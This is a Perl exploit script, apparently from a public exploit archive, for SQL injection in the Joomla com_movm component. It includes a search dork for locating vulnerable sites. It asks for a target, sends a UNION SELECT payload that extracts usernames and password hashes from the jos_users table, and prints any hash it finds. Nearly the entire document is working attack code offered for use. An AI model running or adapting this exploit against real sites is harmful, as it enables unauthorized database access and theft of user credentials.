#Exploit Title: Joomla com_movm SQL Injection exploit
#Dork: inurl:"index.php?option=com_movm"
#Date: 24/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.joomla.org
#Tested on Ubuntu 12.04
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
system("clear");
print "***************************************************\n";
print "* Joomla Component com_movm SQL Injection exploit *\n";
print "* Created by D35m0nd142 *\n";
print "****************************************************\n\n";
sleep 1;
print "Enter target --> ";
sleep 1;
chomp(my $target = <STDIN>);
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
$agent = LWP::UserAgent->new();
$host = $target."/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cgroup_concat(username,0x3a,password)+FROM+jos_users--+";
$resp = $agent->request(HTTP::Request->new(GET=>$host));
$content = $resp->content;
if ($content =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found .\n";
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information